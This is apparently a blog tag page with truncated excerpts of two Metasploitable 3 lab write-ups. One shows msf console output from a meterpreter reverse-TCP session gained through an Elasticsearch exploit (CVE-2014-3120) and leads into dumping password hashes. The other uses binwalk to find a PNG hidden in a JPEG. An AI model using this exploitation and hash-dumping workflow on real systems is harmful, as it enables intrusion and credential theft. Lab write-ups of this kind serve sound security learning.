Posts

Showing posts with the label ace of hearts

Metasploitable 3 - Hashdump without Authentication

Image
Metasploitable 3 Getting a Hashdump without Authentication If you remember, in my Queen of Hearts post, I exploited vulnerability CVE-2014-3120 in Elasticsearch and sent a java/meterpreter/reverse_tcp payload. Going back to that session we can see the meterpreter commands available. msf exploit( script_mvel_rce ) > sessions Active sessions ===============   Id  Type                      Information                         Connection   --  ----                      -----------                         ----------   2   meterpreter java/windows  METASPLOITABLE3$ @ metasploitable3  10.23.10.200:4467 -> 10.20.10.23:49393 (10.20.10.23) msf exploit( script_mvel_rce ) > sessions 2 [*] Startin...

The Ace of Hearts

Image
Metasploitable 3 The Ace of Hearts With the Ten of Diamonds, we also downloaded the Ace of Hearts, this time a JPEG file, let's take a look Not the card we are looking for Ok, this is not what we're looking for, I guess we want PNG files, let's take a closer look to the file with binwalk  root@igor-kali : ~ # binwalk ace_of_hearts.jpg DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 JPEG image data, JFIF standard 1.01 20087 0x4E77 Zip archive data, at least v1.0 to extract, compressed size: 459917, uncompressed size: 459917, name: ace_of_hearts.png 480150 0x75396 End of Zip archive Bingo, there's a Zip file attached to the JPEG file that has a ace_of_hearts.png file inside Some people will extract the ZIP file with 'dd' or with 'foremost' but I'll just make a copy and rename to zip and unzip...